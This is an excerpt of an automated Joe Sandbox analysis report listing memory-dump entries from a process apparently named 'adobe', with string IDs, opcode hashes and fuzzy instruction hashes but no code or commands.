                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434
                                                  • Opcode ID: 75a758db849b7cbc9d4a00b49c57ed4c4ec03323a4a839e257ed2a8851137c69
                                                  • Instruction ID: 671189b28a3c7f47605e1a95b9b4d26857822a35f9e88931173d25c7c120575f
                                                  • Opcode Fuzzy Hash: 75a758db849b7cbc9d4a00b49c57ed4c4ec03323a4a839e257ed2a8851137c69
                                                  • Instruction Fuzzy Hash: F7B15D30E00219CFDB54EFA8D584A6EB7F6EF84304F258869D805AB356DB75DC82CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR]q$LR]q$$]q$$]q
                                                  • API String ID: 0-3527005858
                                                  • Opcode ID: c686ddd6624f2f1468ca62b695e7cbc2b2ef885e75daf05a0c78b6b3e48006bc
                                                  • Instruction ID: c28baeec11e752d54474125ac964ebe9f30fbc3ec8154000176e9e564df603f5
                                                  • Opcode Fuzzy Hash: c686ddd6624f2f1468ca62b695e7cbc2b2ef885e75daf05a0c78b6b3e48006bc
                                                  • Instruction Fuzzy Hash: 6851D530B002159FDB58EF28D850A7A77F6FF89304F1585A9E8069B3A5DB71EC41CB92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434
                                                  • Opcode ID: 9110d85c7dd9cc560a44cce6795861323bf8fbc37b4fbb5d2c9a252c709993b5
                                                  • Instruction ID: dc50cefd5cccb38b40313d41a94878d0d097c37d6240107de63282cbe74ed3af
                                                  • Opcode Fuzzy Hash: 9110d85c7dd9cc560a44cce6795861323bf8fbc37b4fbb5d2c9a252c709993b5
                                                  • Instruction Fuzzy Hash: CB51A330E102048FDFA5EB64D581A6D77B6EF45301F2686B9DC05E7259DB71DC42CB90